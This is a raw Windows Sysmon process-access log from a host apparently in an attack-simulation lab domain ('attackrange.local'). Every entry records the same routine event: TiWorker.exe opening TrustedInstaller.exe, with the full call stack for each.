13:30:30.420{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.420{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.420{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.404{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.404{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.404{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.404{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.404{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.388{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.388{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.388{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.373{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.373{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.373{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.373{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.373{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.357{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.357{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 